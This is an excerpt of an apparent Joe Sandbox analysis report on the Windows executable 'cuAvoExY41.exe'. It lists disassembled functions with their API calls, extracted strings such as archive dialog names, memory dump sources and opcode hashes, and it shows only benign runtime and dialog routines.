                                                          • Instruction Fuzzy Hash: 29019E62A01216BF27211BA65C8DC7F7B6EDAC6BA131A012AB904C7344EB648D02B5B0
                                                          Function 00FD9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00FD91AD,00FDB188,?,00FD9813,00000001,00000364,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FD986E
                                                          • _free.LIBCMT ref: 00FD98A3
                                                          • _free.LIBCMT ref: 00FD98CA
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD98D7
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD98E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 1fe8bc896624052726ba20e588a65d93d2bf3453c8bf19048f880497e806f542
                                                          • Instruction ID: 59108b5848abd01f94911002277bc9e7928f65a0bb03df480ba2625e1a82a37f
                                                          • Opcode Fuzzy Hash: 1fe8bc896624052726ba20e588a65d93d2bf3453c8bf19048f880497e806f542
                                                          • Instruction Fuzzy Hash: 9201443260C6056BC31227A5ACC9A1F362BDBC2B7476C0037F51197392FEB88C02B221
                                                          Function 00FC0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FC11CF: ResetEvent.KERNEL32(?), ref: 00FC11E1
                                                            • Part of subcall function 00FC11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FC11F5
                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FC0F21
                                                          • CloseHandle.KERNEL32(?,?), ref: 00FC0F3B
                                                          • DeleteCriticalSection.KERNEL32(?), ref: 00FC0F54
                                                          • CloseHandle.KERNEL32(?), ref: 00FC0F60
                                                          • CloseHandle.KERNEL32(?), ref: 00FC0F6C
                                                            • Part of subcall function 00FC0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00FC1206,?), ref: 00FC0FEA
                                                            • Part of subcall function 00FC0FE4: GetLastError.KERNEL32(?), ref: 00FC0FF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                          • String ID:
                                                          • API String ID: 1868215902-0
                                                          • Opcode ID: 36d5697e0deebe9432131b58bf76a1d7ef30d3c0c4b6aca0bf6fa6021fe81943
                                                          • Instruction ID: 69c90045d4f4eca6d04455f7bc78a1774fca600159ca39b6f059ad1f5685a318
                                                          • Opcode Fuzzy Hash: 36d5697e0deebe9432131b58bf76a1d7ef30d3c0c4b6aca0bf6fa6021fe81943
                                                          • Instruction Fuzzy Hash: 45019E72000784EFC7229B64DD89FC6BBA9FB08714F00092EF26A92160CB757A45EA50
                                                          Function 00FDC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00FDC817
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FDC829
                                                          • _free.LIBCMT ref: 00FDC83B
                                                          • _free.LIBCMT ref: 00FDC84D
                                                          • _free.LIBCMT ref: 00FDC85F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: f10b44e5758b99cfb6eff88b4059603e60491977b070def4badc97a60a7aa450
                                                          • Instruction ID: 7689c1785dcd9b3d79f8f030499aa6d1907013048d380824680fc8728d799293
                                                          • Opcode Fuzzy Hash: f10b44e5758b99cfb6eff88b4059603e60491977b070def4badc97a60a7aa450
                                                          • Instruction Fuzzy Hash: 7FF01232904245BB8620DB68F8C5C1A73EBAA4476475D1C1BF148DB792CB74FC81FA94
                                                          Function 00FC1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FC1FE5
                                                          • _wcslen.LIBCMT ref: 00FC1FF6
                                                          • _wcslen.LIBCMT ref: 00FC2006
                                                          • _wcslen.LIBCMT ref: 00FC2014
                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00FBB371,?,?,00000000,?,?,?), ref: 00FC202F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$CompareString
                                                          • String ID:
                                                          • API String ID: 3397213944-0
                                                          • Opcode ID: ebef85fe4796c5ca7db880409dc0a5f01423422e6b3c59084ebe314e45fab845
                                                          • Instruction ID: ab21eb3d739047905a53021c77bc21f2784b9a1227dfa682da716e2214f7299a
                                                          • Opcode Fuzzy Hash: ebef85fe4796c5ca7db880409dc0a5f01423422e6b3c59084ebe314e45fab845
                                                          • Instruction Fuzzy Hash: 6BF01D33048014BBCF225F51EC49E8A7F26EB44760B15841AF61A5B1A2CB729665E691
                                                          Function 00FD8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00FD891E
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FD8930
                                                          • _free.LIBCMT ref: 00FD8943
                                                          • _free.LIBCMT ref: 00FD8954
                                                          • _free.LIBCMT ref: 00FD8965
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 264c46090354650038d9494a2eb9b9f33031fc7937af560ff7d2d6b98f9ea0a4
                                                          • Instruction ID: 0de1f690d6b94ccc8cc19b1d9363220e01d7e96cc80888f3c5fd767a41ac5939
                                                          • Opcode Fuzzy Hash: 264c46090354650038d9494a2eb9b9f33031fc7937af560ff7d2d6b98f9ea0a4
                                                          • Instruction Fuzzy Hash: 01F03A7191012AAB86266F24FC4249D3BA3F72C760369094BF094563EACB3F4943FB81
                                                          Function 00FC15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _swprintf
                                                          • String ID: %ls$%s: %s
                                                          • API String ID: 589789837-2259941744
                                                          • Opcode ID: 1898511de31c13fbae6e66451fc9d2626b2813c97630722614f6cbfc43b52ce5
                                                          • Instruction ID: 62c473a8e028b1e5e52e2ba782ea570de6ddb4e8f6f6801ed09ff2dfc53767a6
                                                          • Opcode Fuzzy Hash: 1898511de31c13fbae6e66451fc9d2626b2813c97630722614f6cbfc43b52ce5
                                                          • Instruction Fuzzy Hash: C751B53768C306FAE7211A948F47F757265BB07B04F24450EF386644E3C9A6A430BB5B
                                                          Function 00FD7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\cuAvoExY41.exe,00000104), ref: 00FD7FAE
                                                          • _free.LIBCMT ref: 00FD8079
                                                          • _free.LIBCMT ref: 00FD8083
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Users\user\Desktop\cuAvoExY41.exe
                                                          • API String ID: 2506810119-1573823930
                                                          • Opcode ID: d2828e74aad08f3e41808cec53a835eb57fcbf669463c17221221c0d4d5cd724
                                                          • Instruction ID: 29a99730e54a623db98de6e3e8e1233b71fc683432d3f1e3173cfad471d82690
                                                          • Opcode Fuzzy Hash: d2828e74aad08f3e41808cec53a835eb57fcbf669463c17221221c0d4d5cd724
                                                          • Instruction Fuzzy Hash: 1631A071A04208AFCB21EF95DC8499EBBBEEB84350F1840A7F44497344DB758A46EB91
                                                          Function 00FD31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FD31FB
                                                          • _abort.LIBCMT ref: 00FD3306
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: EncodePointer_abort
                                                          • String ID: MOC$RCC
                                                          • API String ID: 948111806-2084237596
                                                          • Opcode ID: 41cab732f26bd1e5b68d2b9608edeb6f5576f1edff3faba4bab32ab4ac6cfa92
                                                          • Instruction ID: 3a134de4d8fbf97ec441d350369935e6682395297a8189825bf76620083a41ee
                                                          • Opcode Fuzzy Hash: 41cab732f26bd1e5b68d2b9608edeb6f5576f1edff3faba4bab32ab4ac6cfa92
                                                          • Instruction Fuzzy Hash: E0415971D00209AFCF15DF94CD81AEEBBB6FF48315F19805AFA0467211D736AA50EB52
                                                          Function 00FB7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB7406
                                                            • Part of subcall function 00FB3BBA: __EH_prolog.LIBCMT ref: 00FB3BBF
                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00FB74CD
                                                            • Part of subcall function 00FB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FB7AAB
                                                            • Part of subcall function 00FB7A9C: GetLastError.KERNEL32 ref: 00FB7AF1
                                                            • Part of subcall function 00FB7A9C: CloseHandle.KERNEL32(?), ref: 00FB7B00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                          • API String ID: 3813983858-639343689
                                                          • Opcode ID: 367ac0c71d6cd1bffb80565d2654507bce3031f7f8fe8d488427fe73a4f88441
                                                          • Instruction ID: 650c7f74e68b3057b49db3e42f9ef1baf5ad73bca6557670c585565bb996ec64
                                                          • Opcode Fuzzy Hash: 367ac0c71d6cd1bffb80565d2654507bce3031f7f8fe8d488427fe73a4f88441
                                                          • Instruction Fuzzy Hash: AB31B271D04349AADF21EBA5CC45FEE7BA9BF85310F044019F405A7282CB789A44EF61
                                                          Function 00FCAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCAD98
                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FCADAD
                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FCADC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemText$DialogWindow
                                                          • String ID: ASKNEXTVOL
                                                          • API String ID: 445417207-3402441367
                                                          • Opcode ID: 6e06a98ba44bdcf7a0b8d65501083bd5ff95a19159cfafe175d32be5c0791696
                                                          • Instruction ID: e98f0fe9e1472cee28659628f36662b0cd5861478b0b0d64bf74993f72ce079a
                                                          • Opcode Fuzzy Hash: 6e06a98ba44bdcf7a0b8d65501083bd5ff95a19159cfafe175d32be5c0791696
                                                          • Instruction Fuzzy Hash: F211DA32644209AFD7219F68DD06FA677A9EB46756F000014F382DB494C76AA805A726
                                                          Function 00FBD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __fprintf_l.LIBCMT ref: 00FBD954
                                                          • _strncpy.LIBCMT ref: 00FBD99A
                                                            • Part of subcall function 00FC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FF1030,00000200,00FBD928,00000000,?,00000050,00FF1030), ref: 00FC1DC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                          • String ID: $%s$@%s
                                                          • API String ID: 562999700-834177443
                                                          • Opcode ID: 1495c891eac05fef8f13db7eccd11eec4d8106463d151ecda339f4f0e7cc544c
                                                          • Instruction ID: 844b69fb39381a9c69f3a7dd248e210810556b6a0d40989c23ce130f8db85471
                                                          • Opcode Fuzzy Hash: 1495c891eac05fef8f13db7eccd11eec4d8106463d151ecda339f4f0e7cc544c
                                                          • Instruction Fuzzy Hash: AB21A23284024CAEDB21EEA5CD06FEE7BA8AF05704F040526F910961A2F675D658EF52
                                                          Function 00FC0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FBAC5A,00000008,?,00000000,?,00FBD22D,?,00000000), ref: 00FC0E85
                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FBAC5A,00000008,?,00000000,?,00FBD22D,?,00000000), ref: 00FC0E8F
                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FBAC5A,00000008,?,00000000,?,00FBD22D,?,00000000), ref: 00FC0E9F
                                                          Strings
                                                          • Thread pool initialization failed., xrefs: 00FC0EB7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                          • String ID: Thread pool initialization failed.
                                                          • API String ID: 3340455307-2182114853
                                                          • Opcode ID: 4dc53451a69f1f60fa6d560f01ee43ee16d9091134f00143cec1abb2b476b0da
                                                          • Instruction ID: e27a248eff48d861244377658cb6b2635a61d1fdb6e7eda9dbb5206e02720f43
                                                          • Opcode Fuzzy Hash: 4dc53451a69f1f60fa6d560f01ee43ee16d9091134f00143cec1abb2b476b0da
                                                          • Instruction Fuzzy Hash: 5611C4B1A4070DDFC3204F669D89EA7FBDCEB54754F10482EF1C6C7200DA715941AB50
                                                          Function 00FCB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCB2BE
                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FCB2D6
                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00FCB304
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemText$DialogWindow
                                                          • String ID: GETPASSWORD1
                                                          • API String ID: 445417207-3292211884
                                                          • Opcode ID: 8628663ebfda7be0e9f7887da5d28ccd6306ab7c3f08599cf1fc7e66632f0a40
                                                          • Instruction ID: 9378306e6a4ec6a38b29d55cba21e57acfb75a108c262261abfa5ce2aedee1f5
                                                          • Opcode Fuzzy Hash: 8628663ebfda7be0e9f7887da5d28ccd6306ab7c3f08599cf1fc7e66632f0a40
                                                          • Instruction Fuzzy Hash: 6A110836900116B6DB239A64AE4BFFF776CFF19720F000015FA85B60C4C7A99944A761
                                                          Function 00FCDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                          • API String ID: 0-56093855
                                                          • Opcode ID: 76c495db5b4ced632cbc8ae4b7d0effa3947292c0e76a2d8f374c9a3acd71431
                                                          • Instruction ID: a22552f812379eea6b16062c497bdd2d5b86e3a3aea6e224d1c7daec455d02ac
                                                          • Opcode Fuzzy Hash: 76c495db5b4ced632cbc8ae4b7d0effa3947292c0e76a2d8f374c9a3acd71431
